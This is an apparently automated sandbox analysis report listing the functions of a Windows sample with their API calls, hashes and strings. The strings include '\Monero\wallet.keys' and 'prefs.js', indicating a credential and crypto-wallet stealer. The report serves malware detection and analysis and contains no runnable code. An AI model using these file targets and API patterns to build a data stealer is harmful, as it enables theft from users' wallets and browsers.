                          • Opcode ID: e9bc892d8442f81ffbfcf2cce85dced2ab5c2a07976f6540101f54c1097526a1
                          • Instruction ID: acfa79fac32e22a3d3e9d850a189269070a2ba84c4ec9f30890168540800bc32
                          • Opcode Fuzzy Hash: e9bc892d8442f81ffbfcf2cce85dced2ab5c2a07976f6540101f54c1097526a1
                          • Instruction Fuzzy Hash: BA4255729106089BDF16FBB0DD96EED777DAB54300F404698F50A9A081EF349B49CBE2
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00394580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00394587
                          • wsprintfA.USER32 ref: 003945A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 003945BD
                          • StrCmpCA.SHLWAPI(?,003A0FC4), ref: 003945EB
                          • StrCmpCA.SHLWAPI(?,003A0FC8), ref: 00394601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0039468B
                          • FindClose.KERNEL32(000000FF), ref: 003946A0
                          • lstrcat.KERNEL32(?,00E3EA68), ref: 003946C5
                          • lstrcat.KERNEL32(?,00E3D6A0), ref: 003946D8
                          • lstrlen.KERNEL32(?), ref: 003946E5
                          • lstrlen.KERNEL32(?), ref: 003946F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_0_2_380000_file.jbxd): identical to the list given for the first function entry above
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*$h
                          • API String ID: 671575355-2685894120
                          • Opcode ID: 78eb76d3e2728e804953fdc3e252be917b39748e627dbee17545957aca917dbd
                          • Instruction ID: 9fb4a68e76a8f11cef5f80f255d5ce961b7dfaeaa695682f216887ff39fb0488
                          • Opcode Fuzzy Hash: 78eb76d3e2728e804953fdc3e252be917b39748e627dbee17545957aca917dbd
                          • Instruction Fuzzy Hash: CF5166B290021C9FCB25EBB0DC89FED777CEB58304F404588F60996190EB759B898F92
                          APIs
                          • wsprintfA.USER32 ref: 00393EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00393EDA
                          • StrCmpCA.SHLWAPI(?,003A0FAC), ref: 00393F08
                          • StrCmpCA.SHLWAPI(?,003A0FB0), ref: 00393F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0039406C
                          • FindClose.KERNEL32(000000FF), ref: 00394081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_0_2_380000_file.jbxd): identical to the list given for the first function entry above
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$h
                          • API String ID: 180737720-3418665255
                          • Opcode ID: 825499c665a6fb28f6f7ed5093a704ddb6b3af131655246e4e26740c846ba1cc
                          • Instruction ID: ac134226c8a142292185540a1a6c4351128ecff7f9b773924a59eb9737d7c940
                          • Opcode Fuzzy Hash: 825499c665a6fb28f6f7ed5093a704ddb6b3af131655246e4e26740c846ba1cc
                          • Instruction Fuzzy Hash: 4F5156B2900618AFCF25FBB0DC85EEA777CBB54704F004588F65996040EB759B8A8F91
                          APIs
                          • wsprintfA.USER32 ref: 0038ED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 0038ED55
                          • StrCmpCA.SHLWAPI(?,003A1538), ref: 0038EDAB
                          • StrCmpCA.SHLWAPI(?,003A153C), ref: 0038EDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0038F2AE
                          • FindClose.KERNEL32(000000FF), ref: 0038F2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_0_2_380000_file.jbxd): identical to the list given for the first function entry above
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: db1615eeeea62dd4f8f7c49b106757dc41fdd83c57e9c2490b61f211f9b56656
                          • Instruction ID: 5cb5283eba525e577deeeabbedd988c94372c50047f3a96566bf2890de7373ea
                          • Opcode Fuzzy Hash: db1615eeeea62dd4f8f7c49b106757dc41fdd83c57e9c2490b61f211f9b56656
                          • Instruction Fuzzy Hash: 1FE1F1729116189AEF56FB60CC52EEE7778AF54300F4042D9B50A66052EF306F8ADF92
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003A15B8,003A0D96), ref: 0038F71E
                          • StrCmpCA.SHLWAPI(?,003A15BC), ref: 0038F76F
                          • StrCmpCA.SHLWAPI(?,003A15C0), ref: 0038F785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0038FAB1
                          • FindClose.KERNEL32(000000FF), ref: 0038FAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_0_2_380000_file.jbxd): identical to the list given for the first function entry above
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: c850de1f326e7325085e5567317f8e005f8b5387cead9a951ecbb7ab576a05b2
                          • Instruction ID: 345190553593bfe3a6165fd0bb3eb4775beada9ea58b0bd76d1a38f9673c7302
                          • Opcode Fuzzy Hash: c850de1f326e7325085e5567317f8e005f8b5387cead9a951ecbb7ab576a05b2
                          • Instruction Fuzzy Hash: 9DB130719106189FDF26FB60DC96EEE7779AF54300F4082A8E40A9A141EF316B49CFD2
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003A510C,?,?,?,003A51B4,?,?,00000000,?,00000000), ref: 00381923
                          • StrCmpCA.SHLWAPI(?,003A525C), ref: 00381973
                          • StrCmpCA.SHLWAPI(?,003A5304), ref: 00381989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00381D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00381DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00381E20
                          • FindClose.KERNEL32(000000FF), ref: 00381E32
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: e8bc45e8eb5968bd0ddab93fff29ab825be0027592622213ad00f45450d1dcb5
                          • Instruction ID: 3a0518717faf1c9664d67be8a45899cd1d89ffe58afa35426af9825ce381a83b
                          • Opcode Fuzzy Hash: e8bc45e8eb5968bd0ddab93fff29ab825be0027592622213ad00f45450d1dcb5
                          • Instruction Fuzzy Hash: 7A12DD719246189BDF1AFB60CC96EEE7778AF54300F404299B50A6A091EF306F89DFD1
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,003A0C2E), ref: 0038DE5E
                          • StrCmpCA.SHLWAPI(?,003A14C8), ref: 0038DEAE
                          • StrCmpCA.SHLWAPI(?,003A14CC), ref: 0038DEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0038E3E0
                          • FindClose.KERNEL32(000000FF), ref: 0038E3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: 6025f25a974ae067bda761f99ef03d728629f531ca7113b1f7625fa69c7074e0
                          • Instruction ID: 657f861a02882f2d322ce1ba1b83a16218c053819411782396eb43c43196ee86
                          • Opcode Fuzzy Hash: 6025f25a974ae067bda761f99ef03d728629f531ca7113b1f7625fa69c7074e0
                          • Instruction Fuzzy Hash: 18F180718246289ADF17FB60DC95EEE7778BF54300F5042D9A40A66091EF306F8ADF91
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003A14B0,003A0C2A), ref: 0038DAEB
                          • StrCmpCA.SHLWAPI(?,003A14B4), ref: 0038DB33
                          • StrCmpCA.SHLWAPI(?,003A14B8), ref: 0038DB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0038DDCC
                          • FindClose.KERNEL32(000000FF), ref: 0038DDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: 4352db75c054b5525481e408a03103b11c45386ef412d974057e4cdbda4ac861
                          • Instruction ID: 22a5c966a220b8164038bfbea6eca7a428759c6bdf09bc6190cb3fb49b186b33
                          • Opcode Fuzzy Hash: 4352db75c054b5525481e408a03103b11c45386ef412d974057e4cdbda4ac861
                          • Instruction Fuzzy Hash: 369124729106189BDF16FBB0EC56DED777DAF94300F408658F90A9A181EE349B0D8BD2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                           • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 1yg$8F$:dv$P{$Vo1s$aZ$~]+$(Xs
                          • API String ID: 0-3018912018
                          • Opcode ID: e2db3df146af9b82eca178762573702ace902ea5f1c37097785231ed54d0e380
                          • Instruction ID: fb7c940d204a6adf3953666379515c40e21e06c130bbd43fa93e36e257cf604f
                          • Opcode Fuzzy Hash: e2db3df146af9b82eca178762573702ace902ea5f1c37097785231ed54d0e380
                          • Instruction Fuzzy Hash: 57B226B3A082149FE3046E2DEC8567AFBE9EF94720F1A493DEAC4C7744E63558018797
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,003A05AF), ref: 00397BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00397BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00397C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00397C62
                          • LocalFree.KERNEL32(00000000), ref: 00397D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: e13667c04cfc850577ac91fdb1150bd9d1f2ad6aabe688eaae2bccbd9f1c4d0d
                          • Instruction ID: 80e97e073348eac0fe9352ec6d92739cfdacc90ccade130b803cc1e2d0414caf
                          • Opcode Fuzzy Hash: e13667c04cfc850577ac91fdb1150bd9d1f2ad6aabe688eaae2bccbd9f1c4d0d
                          • Instruction Fuzzy Hash: 5A415A7191062CABDF25DB94DC99BEEB7B8FF44700F204299E00966180DB342F89CFA1
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,003A0D73), ref: 0038E4A2
                          • StrCmpCA.SHLWAPI(?,003A14F8), ref: 0038E4F2
                          • StrCmpCA.SHLWAPI(?,003A14FC), ref: 0038E508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0038EBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: 8e3ef79709e35466cc41d15fda64aeca2a5a074b24679d1d4ccd318790550f51
                          • Instruction ID: 9a79cb98fdb2171a009494959310fdda1a216af0c902e4b15f9f8e1ccd601a32
                          • Opcode Fuzzy Hash: 8e3ef79709e35466cc41d15fda64aeca2a5a074b24679d1d4ccd318790550f51
                          • Instruction Fuzzy Hash: 2D1231719106189BDF1AFBA0DC96EED7778AF54300F4046A8B50A9A091EF306F49CFD2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: -o{$!Iy$43Q'$M'Y|$wXfJ$woI@
                          • API String ID: 0-2881124228
                          • Opcode ID: 00286a74cbf312e639e6e19dbf20347e4b3c9828433e6f99751cac760988ae5c
                          • Instruction ID: e33cb09e347a91783c55cc32dc6b349f391f9c2e03fd581969b6d8277c0b6b66
                          • Opcode Fuzzy Hash: 00286a74cbf312e639e6e19dbf20347e4b3c9828433e6f99751cac760988ae5c
                          • Instruction Fuzzy Hash: 2EB229F360C2009FE3086E2DEC8567BB7EAEBD4320F1A853EE6C5C7744E97558058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !1vS$%5Q$jOvW$s/7W$vo??$~m_
                          • API String ID: 0-1724610977
                          • Opcode ID: 3f2f63936ce745fe09b0509dbbcfd2bd1fcfe5fdb12e50ed30e20dbe5fad5410
                          • Instruction ID: 4f61cc93ceefe0af48539b4f1314b0ca90c0a2270af58836c216e145aae29fc7
                          • Opcode Fuzzy Hash: 3f2f63936ce745fe09b0509dbbcfd2bd1fcfe5fdb12e50ed30e20dbe5fad5410
                          • Instruction Fuzzy Hash: EDB2E5F3A0C2049FE3046E2DEC8567AFBE9EF94720F1A493DE6C5C3744EA3558418696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: /<^?$RT?$o%w^$p[M$zJKG${Fo
                          • API String ID: 0-3244588706
                          • Opcode ID: ae0cf292bdd105c78308832a65b9307decff075947dd08d3ded84aa1c9484c60
                          • Instruction ID: 50ea7d9d451d094637504ce056c534b6752643fc04bfbfe50c22a11dca799307
                          • Opcode Fuzzy Hash: ae0cf292bdd105c78308832a65b9307decff075947dd08d3ded84aa1c9484c60
                          • Instruction Fuzzy Hash: A3B216F350C2049FE3046E2DEC8567AFBE9EF94320F16493DEAC487744EA7558058697
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00384EEE,00000000,?), ref: 00389B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389B2A
                          • LocalFree.KERNEL32(?,?,?,?,00384EEE,00000000,?), ref: 00389B3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                           • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID: N8
                          • API String ID: 4291131564-2731101833
                          • Opcode ID: a513bb502861d5604315c42a6171bbd5164c24673da477becab628df20bf6783
                          • Instruction ID: f8444c4544b980b999141e07d1bf4384ce49e32a21bf69f7758c6885d4c407b2
                          • Opcode Fuzzy Hash: a513bb502861d5604315c42a6171bbd5164c24673da477becab628df20bf6783
                          • Instruction Fuzzy Hash: C911D2B4241308EFEB01CF64CC95FAA77B5FB89704F208089F9159B390C7B2AA01DB90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                           • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: /\r_$GKMw$\"~"${B}$I{g
                          • API String ID: 0-2058498375
                          • Opcode ID: 1e458ab8c7a638b002003641484b82b7fb44a8bd5f38985aaa0ce58b713cefe2
                          • Instruction ID: ed63f0980ee13650a3bc8ff30025ec98f777b210ff7c349ed7ff4e79e1aaea8b
                          • Opcode Fuzzy Hash: 1e458ab8c7a638b002003641484b82b7fb44a8bd5f38985aaa0ce58b713cefe2
                          • Instruction Fuzzy Hash: 9EB205F360C2049FE304AE2DEC8567AFBE9EB94620F16493DE6C5C7744EA3598058793
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                           • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 00cfg$U*k=$U*k=$a,T_$pvXp
                          • API String ID: 0-3089016586
                          • Opcode ID: 935e6dd924ab31ae7dc04694eda2dd8a268117abb1362a29f14db52437e24f2c
                          • Instruction ID: 6888594835362c84f3ffaa971920c2c84eaf7c17177b2ca844aa979d3bfdfee2
                          • Opcode Fuzzy Hash: 935e6dd924ab31ae7dc04694eda2dd8a268117abb1362a29f14db52437e24f2c
                          • Instruction Fuzzy Hash: CBB226F3A0C2149FE7046E2DEC8567ABBE5EF94320F1A463DEAC5C7744EA3558058683
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0038C871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0038C87C
                          • lstrcat.KERNEL32(?,003A0B46), ref: 0038C943
                          • lstrcat.KERNEL32(?,003A0B47), ref: 0038C957
                          • lstrcat.KERNEL32(?,003A0B4E), ref: 0038C978
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                           • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
